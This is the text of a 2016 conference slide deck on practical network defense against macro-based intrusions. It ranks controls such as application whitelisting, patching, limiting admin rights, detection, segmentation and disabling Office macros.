BREAK I.T. DOWNA look at computer network defense techniques and strategies that actually work in a world of blinky light sales. Strait up defense served with a side of sarcasm.

Joshua Smith – 2016.07.19

ABOUT ME

THE GOAL

Discuss real world defense techniques to that make an attackers job hard(er)This does not mean It will be easy

It will be free (don’t forget about the cost of time)

THE PROBLEM

It’s 2016 and we still see headlines like this:Noodles & Company Payment Data May Have Been Hacked

From high seas to high tech: Pirates hack shipping company

Hackers selling 117 million LinkedIn passwords

Troy investment company hacked; $495K stolen

Lone wolf claims responsibility for DNC hack

Canadian Gold-Mining Company Hacked, 14.8 GB Data Stolen

China steel firm obtained hacked DuPont trade secrets

HOW?

A macro enabled document, pivot, profit, rinse and repeat

1995 produced the first macro based malware

We are still fighting (and losing) a 20+ year old battle

20 YEARS I SAID

THE ISSUE

Defense is the daughter of offense If you don’t know an attackers tradecraft you are going to have a hard time keeping them

out

We are being sold: Machine Learning

Cyber

Next Gen

The Cloud

Etc.

IT’S MACROS TODAY, HOWEVER, JUST REMEMBER

Technical Control Recommendation Priority

Application WhitelistingOnly approved applications should be allowed to run (this includes .exe, .dll, .js, .bat, etc.) 1

Patch 3rd Party Software 3rd party software (Flash, Silverlight, Java, etc.) needs to be patched 2Patch OS OS patches properly distributed in a timely manner 3Restrict Admin Privileges Users should not be running with administrative rights 4

Host-based Intrusion Detection/Prevention System (HIDS/HIPS)

Implement a HIDS/HIPS to identify when prevention has failed and a host has been successfully compromised 5

Network SegmentationNetwork segmentation helps mitigate post compromise pivoting (i.e., Pass-the-Hash and Pass-the-Ticket) 6

Web Application Firewall (WAF)Implement a WAF to help detect and prevent web based attacks against external websites 7

Event Monitoring

Implement a monitored SIEM to gain visibility into your networks. Event sources include, but not limited to firewall, AV, Active Directory, hosts, IDS/IPS, web logs, etc. 8

Office Document Threat Prevention

All .doc, .docm, .xls, and .xlsm documents should be blocked if possible at the email level and via Group Policy Objects (GPO’s) 9

SSL InterceptionSSL traffic should be intercepted (with exceptions) to identify malicious traffic and filtered as well. 10

APPLICATION WHITELISTING

Only approved applications are allowed to run Free and paid for options

AV is the inverse of this (blacklisting)

Not foolproof (see powershell.exe)

So when a unapproved program tries to run, it gets this:

PATCH 3RD PARTY SOFTWARE

Adobe Flash is currently the most exploited 3rd party software*

Other things like Adobe Reader, Microsoft Silverlight

*This title used belong to Oracle/Sun Java, but that is no longer the case

PATCH OS

Patching Matters Even on Linux and embedded devices

Remote exploits get all the press, but privilege escalation is what we typically exploit (if any exploits are used at all)

RESTRICT ADMINISTRATOR PRIVS

Don’t let users run as administrators*

Why?PivotingPasswordsPersistence

* Yes, I know that this can be very hard

HOST BASED IDS/IPS

So I just bypassed your next-gen firewall, IPS, and synergistic AV product to compromise a fully patched box

DO YOU SEE ME PIVOTING AND EXFILITRATING ALL OF YOUR DATA

OUT THE FRONT DOOR?

NO? ATTACKER BE LIKE..

TAKEAWAY

If you don’t remember anything else from this presentation remember this:

DON’T FORGET ABOUT DETECTION

Required Reading: https://ghostbin.com/paste/6kho7

NETWORK SEGMENTATION

You have your company critical documents accessible to a machine that can look up Pokemon Go cheats?

WEB APPLICATION FIREWALL (WAF)

Website logs are often overlooked

Website attacks can be a forewarning of other things to come

EVENT MONITORING

Logs need to be collected *and* analyzed

Budgets often account for the cost of tools, not the time required to learn, monitor, and review those tools

OFFICE DOCUMENT THREAT PREVENTIONDisable macros Can be done via GPOs

SSL INSPECTION

About 50% of web traffic is now encrypted, including a lot of malicious traffic

A NOTE ABOUT “PEN TESTING”

There is a vast difference between Vulnerability Assessment

Penetration Test

Red Teaming/Adversary Simulation

Helpful when you believe you are secure or you need to grease the wheels to get more money

To reduce costs don’t be afraid to whitecard (but make sure that doesn’t invalidate your test to the executives)

SUMMARY

You probably can use a lot of what you already have to make security at your organization better

Don’t fall for the blinky lights, buzzword laden sales job

Cultural changes are hard and require management by in

Don’t tailor your defense to what security companies are selling, tailor to what attackers are attacking

Leverage red team engagements to get the support you need to make changes

Don’t forget about detection

Defense is hard, not impossible

REFERENCES

Infosec Reactions - https://securityreactions.tumblr.com/

ASD Strategies to Mitigate Targeted Cyber Intrusions - http://www.asd.gov.au/infosec/top-mitigations/mitigations-2014-table.htm

Application Whitelisting - http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-167.pdf

Disable Office Macros - https://medium.com/@networksecurity/it-s-time-to-secure-microsoft-office-be50ec2797e3#.x5ll30jza